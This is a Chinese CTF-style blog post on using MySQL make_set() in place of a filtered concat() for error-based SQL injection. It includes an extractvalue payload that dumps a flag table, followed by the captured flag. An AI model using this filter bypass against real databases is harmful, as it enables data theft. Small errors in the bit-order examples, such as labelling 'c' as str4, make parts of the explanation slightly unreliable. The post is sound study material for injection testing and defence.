MySQL make_set()使用----红日代码审计day1

最新推荐文章于 2024-05-03 10:17:59 发布
最新推荐文章于 2024-05-03 10:17:59 发布
阅读量407 收藏
点赞数 1
分类专栏: SQL注入 web php 文章标签: mysql php sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46079186/article/details/120991059
版权

SQL注入 make_set 二进制反码 错误注入 防注入策略
关键词由CSDN通过智能技术生成
web 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
SQL注入
8 篇文章 0 订阅
订阅专栏
php
3 篇文章 0 订阅
订阅专栏

make_set(bits,str1,str2,…)

返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。结果取二进制反码

前景: 发现个SQL注入,过滤掉了很多东西但是没有过滤报错注入的关键函数,只过滤了coucat
所以我们直接把concat() 替换为 make_set()
先学习一下make_set()

  1. select make_set(1,'a','b','c');
    1 的二进制为 0001 反过来就是 1000,所以取str1(a),打印a
    在这里插入图片描述

  2. select make_set(2,'a','b','c');
    2 的二进制为0010 反过来就是 0100,所以取str2(b),打印b
    在这里插入图片描述

  3. select make_set(3,'a','b','c');
    3 的二进制为0011 反过来就是 1100,所以取 str1(a),str2(b) 打印a,b
    在这里插入图片描述

  4. select make_set(4,'a','b','c');
    4 的二进制为0100 反过来就是 0010,所以取 str4(c) 打印c
    在这里插入图片描述

  5. select make_set(1|4,'a','b','c');
    1|4 的二进制为0001|0100 进行运算,有一个为1 就为1 ,这样就是0101, 反过来就是 1010所以取 str1(a),str3(c), 打印 ac
    在这里插入图片描述

  6. 我们现在实践一下,先查询一下值
    在这里插入图片描述

  7. 使用报错注入语句
    原来报错注入语句
    select extractvalue(null,concat(0x7e,(select * from flag),0x7e));
    修改后
    select extractvalue(null,make_set(3,0x7e,(select * from flag),0x7e));

在这里插入图片描述由于我使用的是 mske_set(3,0x7e,(select * from flag),0x7e)
3 的二进制为 0011 反过来就是 1100 所以取 str1(a),str2(b) 打印 ~,HRCTF{1n0rrY_i3_Vu1n3rab13}

  1. 套到页面,成功
    在这里插入图片描述
mysql-connector-java-8.0.22.jar
08-14
包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-...
mysqlmake_set_MySQL数据库中系统函数MAKE_SET有哪些功能呢?
weixin_33998219的博客
01-20 633
摘要:下文讲述MySQL数据库中系统函数MAKE_SET的用法说明,如下所示;系统函数MAKE_SET功能说明MAKE_SET功能:根据函数中的参数,生成一个使用逗号分隔的字符串MAKE_SET系统函数语法:MAKE_SET(bits,str1,str2,str3...)----------参数说明----------bits:位集合,如:1|2|3 ---注意这些数值会转换为相应的二进制,然后进...
MySQL make_set()的用法
酉酉的博客
10-13 4674
MAKE_SET(bits,str1,str2,…) 返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。 eg1 bits将转为二进制,1的二进制为0001,倒过来为1000,所以取str1(a),打印a. eg2 bits将转为二进制,3的二进制为0011,倒过...
【笔记】【MySQL5.7 从入门到精通】第06章 MySQL函数
zhy29563
07-26 328
目录 6.2 数学函数 6.2.1 ABS(X) && PI() 6.2.2 SQRT(X) && MOD(X,Y) 6.2.3 CEIL(X) && CEILING(X) && FLOOR(X) 6.2.4 RAND && RAND(X) 6.2.5 ROUND(x) && ROUND(X...
MySQL 3.23 中文参考手册
weixin_33757609的博客
06-16 170
2004-02-12 MySQL 译者:晏子 http://www.mysql.com/doc.html http://www.99net.net/doc/database/1076488199/1076550810.html   如果结果的长度大于服务器参数max_allowed_packet,字符串值函数返回NULL。见10.2.3 调节服务器参数。 对于针对字符串位置的操作,第...
无涯教程-MySQL - MAKE_SET() 函数
最新发布
无涯教程
05-03 501
MAKESET(bits,str1,str2,...)是MySQL的String函数。此方法返回给定位的设置值。
MySQL skip-character-set-client-handshake导致的一个字符集问题
09-10
然而,如果启用了`skip-character-set-client-handshake`,服务器就会忽略客户端的字符集设置,强制使用服务器自身的`character_set_server`设定。 在描述的问题中,一旦服务器设置了`character-set-server = utf8`...
MySql_day02-答案.sql
11-19
MySql_day02-答案.sql
audit-plugin-mysql-5.7-1.1.7 for Linux
06-12
mysql 5.7安全审计插件 Linux X86-X64通用...audit-plugin-mysql-5.7-1.1.7 for Linux 等保开启审计插件,貌似官网找不到,发出来共享. 缺点:日志信息比较大,对性能影响大。 优点:对每一时刻每一用户的操作都有记录。
audit-plugin-mysql-5.7-1.1.11-985-linux-x86_64
04-09
这个名为 "audit-plugin-mysql-5.7-1.1.11-985-linux-x86_64" 的压缩包包含了一个针对 MySQL 5.7 版本的审计解决方案,特别设计用来记录和分析数据库的各种操作,如查询、登录尝试、权限变更等。 审计插件的主要...
mysqlmake_set_mysqlmake_set函数
weixin_39972768的博客
01-20 207
使用格式:MAKE_SET(bits,str1,str2,…)1 返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。实验过程1、bits将转为二进制,1的二进制为0000 0001,倒过来为1000 0000,所以取str1(a),打印aselect make_set("...
人大金仓数据库KingbaseES-find_in_set、export_setmake_set函数的使用
arthemis_14的博客
01-08 1808
查询结果如下,其中setlabel列对应的是创建的set中的元素值,第二列就是需要用到的settypid值,这个settypid值会在你创建的同一批set元素是相同的,不同批次的set是不相同的,find_in_set函数在这里的用法就是传入两个参数,第一个是setlabel值,第二个就是settypid值,返回的是set中对应元素的索引。函数的意思就是解析第一个参数的二进制,然后反过来看,是1的就打印出来,打印的就是第一个参数后面的跟着的对应的参数的位置,没有对应位置的就不打印。
MAKE_SET(bits,str1,str2,...)
weixin_62941622的博客
05-01 120
返回一个设定值(一个包含被“,”分开的字符串),这个值由 bits 组中具 有相应的比特的字符串组成。 bits 中的比特值按照从右到左的顺序接受检验(由低位比特到高位比特)。 str1 对应第一位比特值为 1,str2 对应第二位比特值为 1,以此类推。 str1,str2,...中的 NULL 值不会被添加到结果中。 示例 1:将 1 的比特值按从右到左进行校验,“a”对应第一位比特值为 1。 ...
mysqlmake_set_mysqlmake_set函数 anweilx
weixin_32657693的博客
01-20 258
使用格式:MAKE_SET(bits,str1,str2,…)1 返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。实验过程1、bits将转为二进制,1的二进制为0000 0001,倒过来为1000 0000,所以取str1(a),打印aselect make_set("...
mysql MAKE_SET()用法
fangzy0112的专栏
05-28 4688
MAKE_SET(bits,str1,str2,...) 返回一个设定值 (一个包含被‘,’号分开的字字符串的字符串) ,由在bits 组中具有相应的比特的字符串组成。str1 对应比特 0, str2 对应比特1,以此类推。str1, str2, ...中的 NULL值不会被添加到结果中。 mysql> SELECT MAKE_SET(1,'a','b','c'); -> 'a'
mysql 函数 set_mysqlmake_set函数
weixin_35775969的博客
02-27 326
返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。实验过程1、bits将转为二进制,1的二进制为0000 0001,倒过来为1000 0000,所以取str1(a),打印aselect make_set("1","a","b","c");2、bits将转为二进制,2的二进...
MySQL连接库包mysql-connector-java-5.1.27.jar解析
7. 驱动程序配置和使用:在项目中配置mysql-connector-java驱动程序通常涉及设置类路径(classpath)以包含JAR文件,然后在代码中通过加载驱动类并使用DriverManager类来建立连接。 这些知识点是理解“mysql-...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值